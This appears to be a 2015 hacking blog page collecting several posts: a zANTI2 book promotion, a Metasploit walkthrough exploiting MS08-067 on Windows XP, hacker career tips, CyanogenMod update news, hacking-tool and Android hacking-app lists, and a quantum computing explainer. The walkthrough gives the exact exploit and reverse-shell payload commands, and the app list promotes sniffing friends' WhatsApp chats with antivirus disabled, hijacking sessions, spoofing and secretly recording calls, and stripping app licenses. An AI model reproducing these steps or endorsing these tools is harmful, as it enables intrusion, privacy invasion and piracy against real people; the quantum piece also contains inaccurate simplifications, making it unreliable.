Thursday, 3 September 2015

The complete hacking guidebook to zANTI2 is here!

zANTI2 is one of the most powerful tools for penetration testing on Android devices. Sadly, there are not many ways to learn about its mighty functions, thus many useful things are left undiscovered. Well, not anymore. A brand new guidebook to Android penetration testing is here!

Learning zANTI2 for Android Pentesting shows how to dive into the world of advanced network penetration tests to survey and attack wireless networks using your Android device and zANTI2, understand the basics of wireless penetration testing, learn advanced scanning techniques, discover remotely exploitable vulnerabilities, attack and hijack passwords/accounts using the MITM attack and many, many more!

The book is intended for those who want to know more about network penetration tests and have no prior experience, as well as for those who are experienced in network systems and are curious to discover more about this topic. Since zANTI2 features an extremely intuitive and easy to control interface, it doesn't require any special skills.




Interested? Head to Packtpub.com and find out more! - LINK

[Metasploit Tutorial] Hacking Windows XP using IP Address

[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don’t believe me, then read the full article.
Ethical Hacking Certifications
In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.
Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
Exploiting the MS08-067 using Metasploit:
Requirements:
  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:
Create Two Virtual Machine(VM) namely “Target” and “BT5″.  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.
If you don’t know how to create virtual machines , then please read this VirtualBox Manual.
Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.
Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.
Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.
Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.
The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”.  Now you can see the list of modules match with the netapi.
We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.
Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“.  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing ‘ifconfig’ command in the Terminal.
Type “set RHOST 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine.
Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.
Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.
CounterMeasures:
Update your OS frequently.

12 Steps To Become A Hacker

12 Simple Steps To Become A Hacker

Steps to become a hacker
Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

linux operating system
UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.


2. Code in C language 

c programming
C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

programming languages

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

computer networking
Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

operating system
It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

cryptography encryption
To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

hacking or hackers
Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

experiment
After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

hacking vulnerability

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.


10. Contribute To Open Source Security Projects

open source software
An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

learning hacking
Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

discussion
Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

Wednesday, 2 September 2015

CyanogenMod updated to v12.1 Android 5.1 Lollipop, comes with Stagefright patch

CyanogenMod version 12.1 released, gets Android 5.1 and Stagefright security fix

Cyanogen Inc is rolling out firmware update for its CyanogenMod OS starting today. The new version is based on Android 5.1 Lollipop and bumps up the version number to 12.1. CyanogenMod 12.1 comes with a patch for the dreaded Stagefright vulnerability which can be exploited by hackers just by sending a specially crafted Multimedia message or a Google Hangout message.
The Cyanogen website states that the update will rolled out to all OnePlus One device owners starting today, while Andromax Q, Yureka, Yureka Plus, and Yuphoria smartphone owners will have to wait for a little while. The website says that the update for these smartphones will be rolled out once approval and certification process is completed.
The new firmware will provide improved stability and performance across the board and bring following features:
What’s new in 12.1:
  • Smarter Screen: LiveDisplay intelligently adjusts your screen based on environmental conditions.
  • Calendar Together with Email:Enjoy the latest Boxer powered experience where you can seamlessly share your availability and schedule appointments.
  • Cyanogen Browser: The new Cyanogen browser delivers search results and loads web sites faster and more securely than leading browsers.
  • Redesigned Launcher: App Drawer and Folders have been redesigned for one-handed use.
  • Fresh AudioFX: The user interface has been updated for consistency across all devices.
  • More Playback support: Cyanogen has increased added more codec support for video and audio playback.

Cyanogen Browser

The new OS come with a Cyanogen homespun browser called Cyanogen Browser. According to Cyanogen the new browser will be secure and fast. Here are few features of  Cyanogen Browser :
  • Performance: 1.21x better than Chrome in top priority benchmarks
  • Speed: 1.69x faster than Chrome in page load benchmarks
  • Power Efficient: 1.2x better in power efficiency
  • Less Memory Used: Lower runtime memory usage—on average 50-100MB less memory (optimized to not consume as much memory)
  • Location Privacy: When websites ask for access to location, the user can choose to allow for 24 hours (as opposed to allowing permanent access), giving the user finer control over their location privacy
  • Security: Saved passwords for websites are encrypted, increasing password security if your phone is ever lost or stolen

Top 10 hacker Tools (2015)

List of top ten hacker tools of 2015

Every task requires a good set of tools.This because having right tools in hand one can save much of its energy and time.In the world of Cyber Hacking (“Cyber Security” formally) there are millions of tools which are available on the Internet either as Freewares or as Sharewares.
If you are security researcher, pentester or a system admin, you need to have this on your PCs/laptops to find the vulnerabilities and plug them. Concise Courses conducted an online poll to determine top ten hacking tools out of some of the famous ones. Here is the list which came out the winner on the poll.

1. Nmap:  Network Mapper

Abbreviated as nmap is a versatile tool for Network Security, plus it is free and open source.It  is largely used by network administrators for network discovery and security auditing. System admins use nmap for network inventory, determining open ports, managing service upgrade schedules, and monitoring host(A term used for “a computer on a network”) or service uptime. The tool uses raw IP packets in many creative ways to determine what hosts are available on the network, what services (application name and version) they offer,which type of protocols are being used for providing the services,what operating systems (and OS versions and possible patches) and what type and version of packet filters/ firewalls are being used by the target.

2.Metasploit:

A tool for exploiting (Utilising network weakness for making a “backdoor”) vulnerabilities (Weak Points) on Network. This tool is neither free nor open source. But when it comes to features offered it deserves the price it claims. The Metasploit Project is a hugely popular pentesting (penetration testing) or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.

3.Cain and Abel:

Cain & Abel is a password recovery tool that is mostly used for Microsoft Operating Systems. This popular hacking tool allows the user to seek the recovery of various kind of passwords by sniffing the network(capturing some of the data packets), cracking encrypted passwords using Dictionary, Brute-Force(Generation of hashes out of words and then comparison of encrypted hash with the generated one,this method takes less time than dictionary attack method) and Cryptanalysis attacks. Cain, as it is often referred to, can also record VoIP(Voice over IP protocol,used for making calls over using internet) conversations, decode hashed scrambled passwords, recover wireless network keys and more.It can crack various types of hashes including NTLM,MD2,MD5,SHA-1,SHA-2 and many more.These functionalities make Cain and Abel one of the best password recovery tool.

4.Angry IP Scanner: 

Angry IP Scanner, also known as ‘ipscan’ is a freely available (open-source and cross-platform) hacking network scanner that is both fast and easy to use. The main purpose of this hacking tool is to scan IP addresses and ports to find open doors and ports. Worth noting that Angry IP Scanner also has a bunch of other uses as well. Common users of this hacking tool include network administrators and system engineers.

5.John The Ripper: 

John the Ripper is a popular password cracking pentesting tool that is most commonly used to perform dictionary attacks. John the Ripper takes text string samples (from a text file, referred to as a wordlist, containing popular and complex words found in a dictionary or real passwords cracked before), encrypting it in the same way as the password being cracked (including both the encryption algorithm and key), and comparing the output to the encrypted string. This tool can also be used to perform a variety of alterations to dictionary attacks.Including Brute Force and Rainbow attacks.

6.THC Hydra:

Although often considered as yet another password cracker, THC Hydra is hugely popular and has a very active and experienced development team. Essentially THC Hydra is a fast and stable Network Login Hacking Tool that will use dictionary or brute-force attacks to try various password and login combinations against an log in page. This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP(Lightweight Directory Access Protocol),SMB, VNC, and SSH(Secure Shell,used by VPN Softwares).

7.Burp Suite:

A pentesting tool,Burp Suite has several features that can help the penetration tester or ethical hacker. Two commonly used applications used within this tool include the ‘Burp Suite Spider’ which can enumerate and map out the various pages and parameters of a web site by examining cookies and initiates connections with these web applications, and the ‘Intruder’ which performs automated attacks on web applications.

8.Snort:

Snort is an awesome hacking and network tool that can be configured in one of three modes: it can either be used as a sniffer, packet logger, or within network intrusion detection. In the (more commonly used) sniffer mode, this hackers program will read (sniff) network packets and display them on a GUI(Graphical User Interface). In the packet logger mode, Snort will audit and log packets to the disk. In intrusion detection mode, Snort monitors network traffic and analyzes it against a rule set defined by the user.

9.Ettercap:

Ettercap has a huge following and is widely used by cyber security professionals. Ettercap works by placing the user’s network interface into promiscuous mode and by ARP poisoning(ARP : Address resolution protocol is used to determine a host’s MAC address (address of its Network Interface Card) by knowing its IP address. ARP poisoning is a process where a hacker gives wrong information of either its MAC or IP address to the network.) the target machines, i.e. facilitating a ‘Man In The Middle’ or MITM attack. Once successful Ettercap (and the hacker) can deploy various attacks on the victims. A popular feature about Ettercap is its’ ability to support various plugins.

10.Wapiti:

Wapiti has a very loyal following. As a pentesting tool (or framework) Wapiti is able to scan and detect hundreds of possible vulnerabilities. Essentially this Multi Purpose Hacker Tools can audit the security of web applications by performing “black-box” scans, i.e. it does not study the source code of the application but will scan the HTML pages of the application seeking scripts and forms where it can inject data.
If you have any favourite tool of your own which we have not mentioned in the article, kindly mention it in the comments so that we can include it in our next list.

Quantum Computing

What Exactly Is Quantum Computing?

hort Bytes: Quantum computing is hailed as the future. Many companies are putting plausible efforts to make quantum computers a reality. But, what is quantum computing and what are quantum computers? Read the article to know.

For past few months, you must be noticing your news feed is flooded with major breakthroughs and headways in the tech arena. The technology feed could range anything from the recent surge in international cyber intrusions or simple hacking tutorials to space expeditions, defying Moore’s law or the developments in Artificial intelligence. But, what seems to excite most of the tech enthusiasts is the intricate quantum computing and its prospects in future.

The Chinese have announced to set up the world’s first ever and largest hack proof quantum computing communications network from Beijing to Shanghai. Let’s see what these computers actually are and why quantum computing is important for our future!

What is a Quantum Computer?

Quantum computers are nothing like the regular computers or even supercomputers. While thetop supercomputers use extensive parallelism with numerous processing units to get its super speed, the Quantum computers work with the physics of quantum mechanics at its core.

A quantum computer is built atom by atom. Now, quantum mechanics in itself is one of the most dreaded topics in physics, so it is no surprise that the quantum computer bears the same traits as well.

How Does Quantum Computing Work?

The quantum computers use atoms (quanta) as its physical system. Unlike in regular computing where the information is carried in either 0 or 1 bit, the quantum mechanics allows an atom to be in both 0 and 1 state simultaneously. This bit of data is called a qubit. ( Don’t hold your head just yet!)

So, as per the theory, if there are equal number of qubits and the regular bits, then the qubits will hold twice the information, i.e. if there are n qubits in the supercomputer, then it will have 2^n different states. So experimentally, it can hold more information as compared to regular digital bits thereby increasing the speed of the system exponentially.



In theory, the quantum phenomenon seems mind blowing but actually building one is equally painstaking. The qubits are dynamic and are only the probabilistic superposition of all of their states. So, the accurate measurement is difficult and requires complex algorithms such as Shor’s algorithm.

What are the Challenges To Quantum Computing?

One of the biggest challenges is to remove quantum decoherence. Decoherence in a layman’s language could be understood as the loss of information to the environment. The decoherence of the qubits occurs when the system interacts with the surrounding in a thermodynamically irreversible manner.

So, the system needs to be carefully isolated. Freezing the qubits is one of the ways to prevent decoherence.

Past And Present Of Quantum Computing:

The concept of Quantum computing was laid down in the 1980s, but major progress started only two decades later. In 2001, researchers demonstrated Shor’s algorithm to factor 15 using a 7-qubit NMR computer. After that, developments in the field of quantum computing operating system and expansion in the qubit numbers were focussed.

As of today, many private players have entered into the competition to build a quantum computer, that would actually silence the critics. D-Wave has recently claimed to break the 1000 qubits barrier record. Other tech giants such asGoogle and IBM are advancing to develop their own quantum computers as well.

If It’s So Complex, Why Is Everyone After Quantum Computing?

A fully functional quantum computer would require around a million atoms. And right now, we are at a mere thousand. But, what would happen if we reach that limit or even its half?

The complex and massive calculations for example in genome sequencing or tracking weather patterns require huge computers or supercomputers for that matter. Now with the current technology, if the amount of data that a supercomputer can handle is increased by just one digit, the system would fail and you would require an even bigger supercomputer.

Second, the modern day encryption systems are entirely based on the limitations of the regular computers. The normal computers can’t figure out the huge probabilistic analysis required to decrypt any sophisticated code. Even a supercomputer would take years decrypting the RSA cryptography, whereas with the help of Quantum computing it would be a matter of days, if not hours.

Quantum computers will lead to research that are either considered hypothetical or at a standstill. From simulating and computing the molecular scale structures to stretching far into the mysteries of Universe, we cannot even dream of the possibilities.

Quantum computing won’t be of changing your lives in day to day operations, but a quantum communication network would definitely provide a better and secure network.

Have something to add? Tell us in comments below.



Here’s a look at the Top 10 hacking apps for Android smartphones and tablets

Here’s a look at the Top 10 hacking apps for Android smartphones and tablets

Linux is regarded as the best operating system for ethical hacking and penetration testing also called pentesting. There are various hacking apps available for Android, as it is a Linux based operating system. If you want to test out vulnerabilities and find bugs, you need a solid hacking tool to back your research up.

Below is a list of Android hacking applications that will convert your Android device into a hacking machine.

AndroRAT

AndroRAT is a remote administration tool for Android devices. In other words, it is basically a client server application. The aim of the remote administration tool is to give control of the Android system remotely and retrieve information from it.

SpoofApp

(Phone call only) SpoofApp let’s you to place (spoof) calls with any caller ID number. You need SpoofCards to spoof calls, which are sold separately. It also includes some other features such as voice changer, which allows you to change your voice while using it. Additionally, it also allows you to record the whole conversation. You will receive a free 5 minute SpoofCard when you install the app for the first time.

Network Spoofer

Network Spoofer is another good app that allows you to change the website on other people’s computer from your Android phone. You need to download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app then tap on start. This app is considered as a malicious hacking tool by network administrators. So, it is advisable to not try this on unauthorized networks, as this is not a penetration testing app. It is just to exhibit how susceptible the home network is.

Faceniff

(Facebook only) Faceniff is basically used to sniff the Facebook ID over the same network. For instance, if you are on the same network and your Faceniff is turned on, then it will sniff all the Facebook IDs that are logged in from the same network. Since this is a paid version, you need to pay for this on the internet.

WhatsApp Sniffer

(For WhatsApp only) This tool can be used to hack private WhatsApp chats, pictures, audios and videos of your friends who are using your Wi-Fi Hotspot. Disable your antivirus before using this app, as it is detected by antivirus.

APK Inspector

The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps. You can also get the source code of any android application and edit it in order to remove credits and license.

dSploit

dSploit is a free penetration testing suite developed for the Android operating system, which comes with all-in-one network analysis capabilities. It can be used by anyone in order to perform a number of advanced network related tasks. It also contains a number of powerful functions that allow you to analyze, capture, and manipulate network transactions. You can scan networks for connected devices, identify the operating system, running services and open ports on each device, as well as check them for vulnerabilities. The app is designed to be very fast, handy and easy to use.

Wi-Fi Killer

This app allows you to block a person from using your Wi-Fi network. You can disable internet connection for any device that is present in your Wi-Fi network.

DroidSheep

DroidSheep is also one of the free best application for sniffing the sessions over the network. Similar to Faceniff, it not only sniffs the Facebook sessions but also other sessions.

Eviloperator

(Phone call only) This app connects two person automatically in a phone call, which makes them believe that they have called each other. The advantage of this app is that you can record and save the conversation.

Some of the apps given above may work only on rooted Android smartphones. We have given links for the App download, however download the app at your own risk. If you are not familiar with pentesting, theses apps will do you no good.
Kindly mention any other app which you may like for research/hacking/pentesting and we will include it in our future posts.